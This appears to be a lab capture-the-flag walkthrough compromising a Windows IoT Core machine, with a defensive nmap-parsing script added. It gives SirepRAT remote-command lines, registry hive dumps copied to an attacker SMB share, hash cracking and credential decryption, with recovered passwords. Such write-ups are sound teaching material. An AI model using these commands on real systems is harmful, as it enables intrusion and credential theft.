Service overview

We start with an nmap port scan of the machine 10.10.10.204:

$ nmap -sC -sV -p- -Pn -v 10.10.10.204
$ nmap --privileged -sU -sV -p- -Pn -v 10.10.10.204

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=5/29%Time=60B25E0D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
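As an added audit check, not part of the original writeup, the following Python parses nmap's normal output and flags the Windows IoT Core management services seen in the scan above (Windows Device Portal on 8080 and the Sirep test service on 29817/29819/29820; the Sirep port mapping is taken from the SirepRAT project's documentation and is an assumption here). The sample output is constructed from the scan on this page.

```python
import re
from typing import Dict, List

# Management services IoT Core exposed in the scan above; none of them should be
# reachable from an untrusted network. Sirep ports per SirepRAT docs (assumption).
IOT_CORE_MGMT_PORTS: Dict[int, str] = {
    8080: "Windows Device Portal",
    29817: "Sirep test service",
    29819: "Sirep test service",
    29820: "Sirep test service",
}

# Constructed sample in nmap's normal output format, modelled on the scan above.
SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
"""

PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(nmap_text: str) -> List[dict]:
    """One record per open port; NSE lines ('|', '|_') are attached to the preceding port."""
    ports: List[dict] = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            if state == "open":
                ports.append({"port": int(port), "proto": proto, "service": service,
                              "version": version or "", "basic_auth": False})
        elif line.startswith("|") and ports and "Basic realm=" in line:
            ports[-1]["basic_auth"] = True  # HTTP Basic auth offered on this port
    return ports


def exposed_mgmt_services(nmap_text: str) -> Dict[int, str]:
    """Map each open IoT Core management port to a human-readable finding."""
    findings: Dict[int, str] = {}
    for p in parse_open_ports(nmap_text):
        name = IOT_CORE_MGMT_PORTS.get(p["port"])
        if name is None:
            continue
        finding = f"{name} exposed on {p['port']}/{p['proto']}"
        if p["basic_auth"] and p["port"] != 443:
            finding += " (Basic auth over cleartext HTTP)"
        findings[p["port"]] = finding
    return findings
```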

We discover a Windows Device Portal and use a public exploit for it:

git clone https://github.com/SafeBreach-Labs/SirepRAT
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

Dump the SAM and SYSTEM files:

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SYSTEM C:\SYSTEM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SAM C:\SAM"

Start a local Samba server to retrieve the files and copy them to our machine:

python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SAM \\\\10.10.14.6\\Public\\SAM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SYSTEM \\\\10.10.14.6\\Public\\SYSTEM"

Run the brute force:

$ samdump2 SYSTEM SAM > hash
$ echo "aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95" > hash.txt
$ john --fork=4 --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
app:mesh5143

Go to http://10.10.10.204:8080/#Device%20Settings and enter the obtained credentials.

User flag

Command> dir C:\data\users\app
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677
 Directory of C:\data\users\app
07/04/2020  09:53 PM    <DIR>          .
07/04/2020  09:53 PM    <DIR>          ..
07/04/2020  07:28 PM    <DIR>          3D Objects
07/04/2020  07:28 PM    <DIR>          Documents
07/04/2020  07:28 PM    <DIR>          Downloads
07/04/2020  07:28 PM    <DIR>          Favorites
07/04/2020  08:20 PM               344 hardening.txt
07/04/2020  08:14 PM             1,858 iot-admin.xml
07/04/2020  07:28 PM    <DIR>          Music
07/04/2020  07:28 PM    <DIR>          Pictures
07/04/2020  09:53 PM             1,958 user.txt
07/04/2020  07:28 PM    <DIR>          Videos
               3 File(s)          4,160 bytes
               9 Dir(s)   4,692,443,136 bytes free
Command> type C:\data\users\app\hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
Command> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::4943:80ed:ab82:e853
   Temporary IPv6 Address. . . . . . : dead:beef::2d12:c117:bdc3:a673
   Link-local IPv6 Address . . . . . : fe80::4943:80ed:ab82:e853%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.204
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\iot-admin.xml;$credential.GetNetworkCredential().password"
Omni\Administrator:_1nt3rn37ofTh1nGz
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"
7cfd50f6bc34db3204898f1505ad9d70

Log in again as administrator.

Root flag

$ powershell -c "$credential = import-clixml -path C:\Data\Users\administrator\root.txt;$credential.GetNetworkCredential().password"
5dbdce5569e2c4708617c0ce6e9bf11d